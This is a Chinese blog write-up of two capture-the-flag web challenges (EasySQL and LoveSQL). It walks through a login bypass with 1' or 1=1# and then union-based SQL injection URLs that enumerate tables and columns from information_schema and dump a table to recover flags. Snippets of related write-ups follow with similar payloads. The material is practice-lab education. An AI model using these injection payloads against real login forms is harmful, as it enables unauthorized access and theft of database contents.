[极客大挑战 2019]EasySQL & [极客大挑战 2019]LoveSQL

最新推荐文章于 2024-10-17 11:21:39 发布
最新推荐文章于 2024-10-17 11:21:39 发布
阅读量83 收藏
点赞数
文章标签: java 数据库 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53386879/article/details/132652959
版权

一道easySql

尝试一下弱口令

看到url框有刚刚输入的账号:1   密码:1

试试万能密码

1' or 1=1#

原理:

假设登录的验证的语句是

select * from admin where username= '".$username."' and password= '".md5($password)."'

那么我将  1' or 1=1#  放在用户名的位置

那么语句会变成

select * from admin where username= '1' or 1=1#' and password= '".md5($password)."'

#  将后面的' and password= '".md5($password)."'注释掉了

select * from admin where username= '1' or 1=1

此时这条语句恒真

自然就进去了flag:flag{55b93b12-e685-44d5-9093-5c304ef6a036}

进去看看

想用sqlmap我不拦着哈哈哈哈哈哈

像前边那样用万能密码看看

有一串这玩意

Your password is '284af4078468d974217166f20e9aa249'

拿去md5试了下没成,但是却弄出了用户名是admin

那就试试url框注入,这里用的注释是url编码%23

/check.php?username=admin'  and 1=1%23&password=a

/check.php?username=admin'  and 1=-1%23&password=a

观察回显有注入点,狂喜

开始猜字段数

/check.php?username=admin' order by 4%23&password=a

一直到order by 4的时候回显错误

用union搞出来回显位置

/check.php?username=a' union select 1,2,3%23&password=a

查询当前数据库名及版本:

/check.php?username=a' union select 1,database(),version()%23&password=a

数据库名是:geek

爆表爆表

/check.php?username=a' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=a

两个表:geekuser,l0ve1ysq1

不知道藏哪个表里?

全干一遍

试过了,冲  l0ve1ysq1  这个表

干字段

/check.php?username=a' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=a

有字段:id,username,password

干数据

/check.php?username=a' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=a
可长一坨,但是往后拉看见了flag字样flag{e3a3f174-abc3-4823-a2fe-7e1203767584}

星夜赴科场
关注
BUUCTF刷题记录[SUCTF 2019]EasySQL && [极客挑战 2019]LoveSQL
weixin_44120469的博客
12-04 168
BUUCTF刷题记录 [SUCTF 2019]EasySQL && [极客挑战 2019]LoveSQL [SUCTF 2019]EasySQL 这道题确实把我困住了 只有一个输入框,fuzz之后发现过滤了不少东西,显示Nonono 输入1之后显示 而且不管输入几都是这个界面 但是输入字母不是。 在这里我确实没有想到要去猜测后台查询字符的格式。 然而可以通过这里猜测到后台语句中有一个|| 1;show databases# 查询数据库信息 1;show table
[极客挑战 2019]LoveSQL
kuller_Yan的博客
05-19 318
[极客挑战 2019]LoveSQL-------wp from Kuller_yan 先打开靶场 看看题目 一看就和上一题 easysql 尝试万能钥匙1' or 1=1 # 看起来像md5解密,但是解密失败,继续查询字段,admin' order by 3 # admin' order by 4 # 到4的时候没有正常返回,然后用1' union select 1,2,3 # 回显点为2,3;然后用1' union select 1,database(), version() # 可以看到库名
【BUUCTF】[极客挑战 2019]LoveSQL1writeup
GZWZ_的博客
05-04 1062
easysql
BUUCTF WEB笔记之[极客挑战2019] EasySQLLoveSQL、BabySQL、HardSQL
weixin_48799157的博客
03-26 2720
小白一个,记录一下解题过程,如有错误请指正! 一、EasySQL 1.这里我们使用一句话万能密码就可以了,记得加上# 1' or '1'='1'# 2.登录就可以拿到flag 二、LoveSQL 网页里说用sqlmap是没有灵魂滴,但是还是手痒试了一下,发现什么都扫不出来,可能是我太菜了能力还没到家,希望有大佬能指点一下~ 1.我们只能运用灵魂了,用万能句尝试一下,发现登录进来了,但是没有flag 2.猜测flag应该是放在某个字段里了,我们用联合注入(un...
极客挑战2019LoveSQL解题
Bird&Bird
10-25 2279
1、打开靶机:BUUCTF在线评测,选择web---->【极客挑战2019LoveSQL 打开被测试站点,是这个样子的,是上一题EasySQL的延续。 2、EasySQL那道题采用万能密码,我们也直接使用万能密码试一下,结果如下: 直接给出了密码。 使用正确的用户名和密码登录一下,结果还是 那使用MD5库碰撞一下,结果也没碰撞出来。 3、继续寻常注入吧。 爆破有多少列(字段数) username=admin&password=6ec1cab79005129..
[极客挑战2019] EasySQLLoveSQL、BabySQL、HardSQL、FinalSQL
weixin_45222575的博客
04-19 185
仅用于记录ctf练习过程,欢迎大佬指正!万能密码直接拿下!'or 1=1#注:不输密码的话会提示,推测后端做了非空校验先用万能密码试试,登录成功,但是没有返回flag,猜测flag在数据库中,使用常规爆破思路当列数为4的时候报错,说明返回列数有三行,2,3行有回显,可以利用推测'l0ve1ysq1'表有flag,继续爆列名推测flag应该在username或password里,爆破。
BUUCTF [极客挑战 2019] BabySQL
Senimo
03-25 4001
BUUCTF [极客挑战 2019] BabySQL 启动靶机,打开环境: 尝试登陆: 因为前两次的题目BUUCTF 极客挑战 2019 EasySQL和均用万能密码登陆成功,再次尝试: /check.php ?username=admin' or '1'='1 &password=1 登陆失败,尝试注释掉password内容: /check.php ?username=adm...
BUUCTF[极客挑战 2019]LoveSQL1
weixin_53955759的博客
06-18 216
这一题和easysql页面一样
BUUCTF web 极客挑战 2019
菜的只能随便写写博客
04-01 1807
0x01 Secret File  在源码之中得到一个php页面  后面页面之中  根据提示抓包,在其中返回的页面得到了信息  得到源码,根据源码,发现存在文件包含漏洞  利用php伪协议,获取flag.php的信息,拿取flag payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php EasyS...
BUUCTF-WEB
ccfly1012的博客
11-02 3896
目录 [HCTF 2018]WarmUp [极客挑战 2019]EasySQL 总结万能密码 [极客挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
基于SSM班级事务管理系统的设计
2401_87849773的博客
10-15 370
管理员账户功能包括:系统首页,个人中心,学生管理,班委管理,班会组织管理,健康档案管理,党员发展管理,党员培训管理,学生成绩管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。班委账号功能包括:系统首页,学生管理,学生成绩管理,活动信息管理,班费通知管理。服务器:SpringBoot自带 apache tomcat。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发系统:Windows。
Java安卓开发之Fragment开发(通俗易懂版)——第8章
一个脚本小子的博客
10-13 674
FragmentManager中的getSupportFragmentManager()方法不支持Activity,不论是旧版的FragmentManager还是新版的,因此我们要把继承Activity类改成继承AppCompatActivity类。
JavaWeb合集05-SpringBoot基础知识
qq_57340195的博客
10-17 662
Autowrite :自动装配,通过声明的数据类型来装配对应的bean对象。缺点,只能获取到一个相同类型的bean对象,如果有IOC容器里面有2个Bean对象,使用@Autowrite依赖注入就好报错。由于三层架构中,每一层都需要下次成来提供对应的方法,所有要new 下一次的对象,如果上一层的类名发送改变,那么上一层就需要修改对应的类名,如下。3、@Resource注解:通过它来代替@Autowrite注解,直接指定要注入的Bean对象,参数name的值就是要注入的Bean对象。
确保Spring Boot定时任务只执行一次方案
2301_76419561的博客
10-14 406
确保Spring Boot定时任务只执行一次有多种方法,你可以根据实际需求选择最适合的方法。如果你需要更复杂的任务调度或周期性执行,@Scheduled注解和接口是更合适的选择。而对于一次性的初始化任务或应用程序启动任务,注解和实现接口则更为简洁明了。
spring task的使用场景
qq_40603125的博客
10-13 330
spring任务调度框架约定的时间。
Java 22 | 8】 深入解析Java 22 :Pattern Matching 特性详解
最新发布
颜淡慕潇
10-17 1690
Java 22 进一步扩展了模式匹配(Pattern Matching)功能,简化了类型检查和条件表达式的使用。此特性不仅提升了代码的可读性,还减少了常见的错误。以下是对 Java 22 中模式匹配的详细介绍,包括基础概念、增强特性、使用场景、示例代码,以及如何在实际项目中有效利用模式匹配
代理模式、BigDecimal详解
Mr.W的博客
10-14 1030
BigDecimal可以实现对浮点数的运算,不会造成精度丢失。通常情况下,大部分需要浮点数精确运算结果的业务场景(比如涉及到钱的场景)都是通过BigDecimal来做的。浮点数之间的等值判断,基本数据类型不能用 == 来比较,包装数据类型不能用 equals 来判断。想要解决浮点数运算精度丢失这个问题,可以直接使用BigDecimal来定义浮点数的值,然后再进行浮点数的运算操作即可​​// 0。
Backend - Java 基础
是萝卜干呀的博客
10-11 848
知识量决定了未来能走多远
极客挑战 2019]EasySQL
09-03
EasySQL极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要根据题目要求来编写 SQL 查询语句,从而得到正确的结果。这道题的目标是考察你对 SQL 查询语句的掌握程度和对数据库操作的理解。 在极客挑战 2019 中,EasySQL 是一个相对较简单的题目,旨在帮助参赛者熟悉 SQL 查询语句的基本使用和常见操作。通过解决这个问题,你将能够提高自己的 SQL 查询能力,并为更复杂的数据库操作打下基础。 如果你有关于 EasySQL 的具体问题,我可以帮助你更详细地解答。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值